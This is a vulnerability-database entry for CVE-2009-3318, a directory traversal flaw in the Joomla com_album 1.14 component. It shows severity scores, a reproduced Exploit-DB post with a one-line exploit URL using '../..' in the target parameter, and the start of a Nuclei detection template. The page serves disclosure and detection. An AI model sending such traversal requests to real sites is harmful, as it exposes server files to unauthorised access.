CVE-2009-3318
Published 2009-09-23
Priority P347, high, 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 6.46% (92.9th percentile)
Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| breedveld | com_album | — | — |
No detection rules found.
Exploit-DB
Joomla! Component com_album 1.14 - Directory Traversal
exploitdb·2009-09-17
---
Joomla Component com_album Directory Traversal Vuln (version Album #1.14 )
# Author : DreamTurk
# mail : [email protected]
# home page : www.turkguvenligi.info
Down : http://www.breedveld.net/index.php?option=com_remository&Itemid=193&func=startdown&id=1
exp : http://localhost/index.php?option=com_album&Itemid=128&target=/../..
# gretZ : aLL My Friends & turkguvenligi.info Members & t4cs1zkr4L
note:
Album
23-05-2007
Roland Breedveld
This component is released under the GNU/GPL License
[email protected]
Breedveld.net
1.14
Album Component For Joomla/str0ke
# milw0rm.com [2009-09-17]
Nuclei
Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
nuclei·CVSS 7.5
Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
Template:
id: CVE-2009-3318
info:
  name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
  impact: |
    The vulnerability allows an attacker to include arbitrary files from the local file system,